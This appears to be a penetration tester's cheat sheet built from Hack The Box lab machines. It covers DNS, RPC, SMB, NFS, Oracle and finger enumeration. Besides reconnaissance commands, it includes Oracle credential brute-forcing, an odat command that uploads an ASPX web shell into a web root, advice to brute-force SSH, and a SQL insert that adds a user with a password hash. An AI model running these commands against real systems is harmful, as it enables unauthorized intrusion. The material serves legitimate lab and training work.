DNS Enumeration:

Zone Transfer commands:

host -l friendzone.htb
dig axfr friendzoneportal.red @10.10.10.123

Find subdomains with wfuzz
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u https://10.10.10.113 -H "Host: FUZZ.redcross.htb" --hw 28 --hc 400
*****************************************************************************************************************************
RPC Enumeration:

Connect with RPC Service
rpcclient -U "" -N 10.10.10.161

get a list of users with enumdomusers:
enumdomusers

list the group:
enumdomgroups

query the user with rid:
queryuser <rid>

query the group with group rid
querygroup <rid>

Once you get a list of user save it on file and run following command to extract usernames from the file
cat domain-users.txt | cut -d'[' -f2 | cut -d']' -f1

*****************************************************************************************************************************
SMB ENume:

List Directories:

smbmap -H 10.10.10.3

Connect to smb:

smbclient -N //10.10.10.3/tmp
smbmap //10.10.10.123/general

If above command didn't work try:

smbclient -N -L //10.10.10.3/tmp --option='client min protocol=NT1'

Access SMB with valid Creds:

smbclient -W active.htb -U Administrator //10.10.10.3/tmp

Nmap command to find smb vulns:

nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4
nmap -sV -p445,139 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" --script-args=unsafe=1 10.129.136.29 -v

Mount the SMB share:

mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC /mnt/L4mpje-PC/ -o user=anonymous

Mount hard disk volumes:

guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2/
*****************************************************************************************************************************

NFS Enum:

Shows the directories moundted on NFS:
Showmount -e <target>

mount nfs share with following command:


mkdir /tmp/mount && mount 192.168.1.22:/home/karl /tmp/mount
mount -t nfs 10.129.228.109:/home/ross /mnt
*****************************************************************************************************************************

Oracle Enumeration:

SID Bruteforce

auxiliary/scanner/oracle/sid_brute

Credentials bruteforce

auxiliary/admin/oracle/oracle_login

Upload shell in oracle:

odat dbmsxslprocessor --sysdba -s 10.10.10.82 -U scott -P tiger -d XE --putFile "C:\\inetpub\\wwwroot\\" "shell1.aspx" "/home/deepak/HTB/Boxes/Silo/shell1.aspx"
*****************************************************************************************************************************

Finger

Port 79:

Tool for enum users:

http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz

Command:

./finger-user-enum.pl -U /usr/share/SecLists/Usernames/Names/names.txt -t 10.129.124.110

You will get some users after running the script, run a bruteforce attack on one of the user and login with ssh:

ssh -p 22022 sunny@10.10.10.76
*****************************************************************************************************************************
Postgresql Statement to insert data in a database:

insert into passwd_table (username, passwd, gid, homedir) values ('sud0xdfer', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 27, '/home/penelope');
